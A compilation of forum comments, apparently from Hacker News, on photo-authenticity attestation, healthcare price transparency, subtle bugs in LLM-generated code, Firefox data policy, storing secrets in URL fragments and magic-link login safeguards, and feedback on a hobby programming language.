This camera's attestation and zero-knowledge proof cannot verify that a photo is not AI generated. Worse, those "verifications" may trick people into believing photos are trustworthy or authentic that are not.
Similar to ad-clicks or product reviews, if this were to catch on, Roc cameras (and Roc camera farms) will be used to take photos of inauthentic photos.
Ultimately, the only useful authenticity test is human reputation.
If someone (or an organization) wants to be trusted as authentic, the best they can do is stake their identity on the authenticity of things they do and share, over and over.
Patients and providers should have the ability to shop and negotiate price directly with each other. No 3rd party will ever be in a better position to negotiate individualized care and prices for 350,000,000 people better than we (or our family) can for ourselves.
Currently, patients cannot price compare anything, not even for the exact same drug from two different pharmacies on the same street! To make it worse, most providers can't even make sense enough of the provider-insurer prices to shop on behalf of the patients.
To improve prices in healthcare, all care must have a price visible to all, paid by patients. Insurance should be required by law to publicly publish their reimbursement rates and immediately (48 hours) reimburse their insured patients for care at approved (in-network) providers.
This would end the current: impossible to self advocate, impossible for providers to advocate on behalf of patients, intractable insurer-provider price web.
Insurers and providers should never negotiate price. Providers should only be concerned with providing good care, how to classify/code it, and the amount they need to charge for that care to be financially viable. Insurers should only be concerned with how much they will pay out for each classification/code, and which providers they authorize as in-network.
Last, since there is a long tail of medical care that doesn't fit nicely into a code box, each plan should have a mandatory minimum coverage of something like 50% all unknown-care costs at in-network providers and pharmacies above $5,000 annually, with some annual cap.
As a society, if we want to further subsidize healthcare for those with lower economic means, and/or those who end up with catastrophic expenses, then that should be done on it's own, as two distinct standalone welfare programs.
I've found that as LLMs improve, some of their bugs become increasingly slippery - I think of it as the uncanny valley of code.
Put another way, when I cause bugs, they are often glaring (more typos, fewer logic mistakes). Plus, as the author it's often straightforward to debug since you already have a deep sense for how the code works - you lived through it.
So far, using LLMs has downgraded my productivity. The bugs LLMs introduce are often subtle logical errors, yet "working" code. These errors are especially hard to debug when you didn't write the code yourself — now you have to learn the code as if you wrote it anyway.
I also find it more stressful deploying LLM code. I know in my bones how carefully I write code, due to a decade of roughly "one non critical bug per 10k lines" that keeps me asleep at night. The quality of LLM code can be quite chaotic.
That said, I'm not holding my breath. I expect this to all flip someday, with an LLM becoming a better and more stable coder than I am, so I guess I will keep working with them to make sure I'm proficient when that day comes.
I have been using LLMs for coding a lot during the past year, and I've been writing down my observations by task. I have a lot of tasks where my first entry is thoroughly impressed by how e.g. Claude helped me with a task, and then the second entry is a few days after when I'm thoroughly irritated by chasing down subtle and just _strange_ bugs it introduced along the way. As a rule, these are incredibly hard to find and tedious to debug, because they lurk in the weirdest places, and the root cause is usually some weird confabulation that a human brain would never concoct.
Saw a recent talk where someone described AI as making errors, but not errors that a human would naturally make and are usually "plausible but wrong" answers. i.e. the errors that these AI's make are of a different nature than what a human would do. This is the danger - that reviews now are harder; I can't trust it as much as a person coding at present. The agent tools are a little better (Claude Code, Aider, etc) in that they can at least take build and test output but even then I've noticed it does things that are wrong but are "plausible and build fine".
I've noticed it in my day-to-day: an AI PR review is different than if I get the PR from a co-worker with different kinds of problems. Unfortunately the AI issues seem to be more of the subtle kind - the things if I'm not diligent could sneak into production code. It means reviews are more important, and I can't rely on previous experience of a co-worker and the typical quality of their PR's - every new PR is a different worker effectively.
I'm curious where that expectation of the flip comes from? Your experience (and mine, frankly) would seem to indicate the opposite, so from whence comes this certainty that one day it'll change entirely and become reliable instead?
I ask (and I'll keep asking) because it really seems like the prevailing narrative is that these tools have improved substantially in a short period of time, and that is seemingly enough justification to claim that they will continue to improve until perfection because...? waves hands vaguely
Nobody ever seems to have any good justification for how we're going to overcome the fundamental issues with this tech, just a belief that comes from SOMEWHERE that it'll happen anyway, and I'm very curious to drill down into that belief and see if it comes from somewhere concrete or it's just something that gets said enough that it "becomes true", regardless of reality.
Firefox should make it clear that Firefox (browser) will not collect, transmit, nor sell user data beyond what is technically required for interaction between the browser and other computers over networks.
Anything less and people stop using Firefox.
If other Mozilla services need broader terms, those should be separate.
To create private shareable links, store the private part in the hash of the URL. The hash is not transmitted in DNS queries or HTTP requests.
Ex. When links.com?token=<secret> is visited, that link will be transmitted and potentially saved (search parameters included) by intermediaries like Cloud Flare.
Ex. When links.com#<secret> is visited, the hash portion will not leave the browser.
Note: It's often nice to work with data in the hash portion by encoding it as a URL Safe Base64 string. (aka. JS Object ↔ JSON String ↔ URL Safe Base 64 String).
> Ex. When links.com?token=<secret> is visited, that link will be transmitted and potentially saved (search parameters included) by intermediaries like Cloud Flare.
Note: When over HTTPS, the parameter string (and path) is encrypted so the intermediaries in question need to be able to decrypt your traffic to read that secret.
Everything else is right. Just wanted to provide some nuance.
Good to point out. This distinction is especially important to keep in mind when thinking about when and/or who terminates TLS/SSL for your service, and any relevant threat models the service might have for the portion of the HTTP request after terminattion.
Huge qualifier: Even otherwise benign Javascript running on that page can pass the fragment anywhere on the internet. Putting stuff in the fragment helps, but it's not perfect. And I don't just mean this in an ideal sense -- I've actually seen private tokens leak from the fragment this way multiple times.
Which is yet another reason to disable Javascript by default: it can see everything on the page, and do anything with it, to include sending everything to some random server somewhere.
I am not completely opposed to scripting web pages (it’s a useful capability), but the vast majority of web pages are just styled text and images: Javascript adds nothing but vulnerability.
It would be awesome if something like HTMX were baked into browsers, and if enabling Javascript were something a user would have to do manually when visiting a page — just like Flash and Java applets back in the day.
Is there a feature of DNS I'm unaware of, that queries more than just the domain part? https://example.com?token=<secret> should only lead to a DNS query with "example.com".
The problem isn't DNS in GP. DNS will happily supply the IP address for a CDN. The HTTP[S] request will thereafter be sent by the caller to the CDN (in the case of CloudFlare, Akamai, etc.) where it will be handled and potentially logged before the result is retrieved from the cache or the configured origin (i.e. backing server).
Correct, DNS only queries the hostname portion of the URL.
Maybe my attempt to be thorough – by making note of DNS along side HTTP since it's part of the browser ↔ network ↔ server request diagram – was too thorough.
Thanks, finally some thoughts about how to solve the issue. In particular, email based login/account reset is the main important use case I can think of.
Do bots that follow links in emails (for whatever reason) execute JS? Is there a risk they activate the thing with a JS induced POST?
To somewhat mitigate the link-loading bot issue, the link can land on a "confirm sign in" page with a button the user must click to trigger the POST request that completes authentication.
Another way to mitigate this issue is to store a secret in the browser that initiated the link-request (Ex. local storage). However, this can easily break in situations like private mode, where a new tab/window is opened without access to the same session storage.
An alternative to the in-browser-secret, is doing a browser fingerprint match. If the browser that opens the link doesn't match the fingerprint of the browser that requested the link, then fail authentication. This also has pitfalls.
Unfortunately, if your threat model requires blocking bots that click too, your likely stuck adding some semblance of a second factor (pin/password, bio metric, hardware key, etc.).
In any case, when using link-only authentication, best to at least put sensitive user operations (payments, PII, etc.) behind a second factor at the time of operation.
Makes sense. No action until the user clicks something on the page. One extra step but better than having “helpful bots” wreak havoc.
> to store a secret in the browser […] is doing a browser fingerprint match
I get the idea but I really dislike this. Assuming the user will use the same device or browser is an anti-pattern that causes problems with people especially while crossing the mobile-desktop boundary. Generally any web functionality shouldn’t be browser dependent. Especially hidden state like that..
The secret is still stored in the browser's history DB in this case, which may be unencrypted (I believe it is for Chrome on Windows last I checked). The cookie DB on the other hand I think is always encrypted using the OS's TPM so it's harder for malicious programs to crack
Yes, adding max-use counts and expiration dates to links can mitigate against some browser-history snooping. However, if your browser history is compromised you probably have an even bigger problem...
The syntax of your language is quite nice. I’d maybe change (for …) to (each …), (fun …) to (fn …), and (let …) to (def …) or (set …) depending on implementation details of variable assignment, but those are just aesthetic preferences :)
I love '{thing}' for string interpolation.
If you haven’t already, check out clojure, janet-lang, io-lang, and a library like lodash/fp for more syntax and naming inspiration.
Thanks, I think this language will probably keep my hacking for a while :). you're right about the keyword naming, i tried to be unique, maybe too much for functions, simply because i love them being named "fun". Let in the current implementation definitely is confusing due to it being used for defining and updating a variable and its contents - maybe ill change it to let and set or def and set, who knows. Thanks for the feedback :)
Similar to ad-clicks or product reviews, if this were to catch on, Roc cameras (and Roc camera farms) will be used to take photos of inauthentic photos.
Ultimately, the only useful authenticity test is human reputation.
If someone (or an organization) wants to be trusted as authentic, the best they can do is stake their identity on the authenticity of things they do and share, over and over.
reply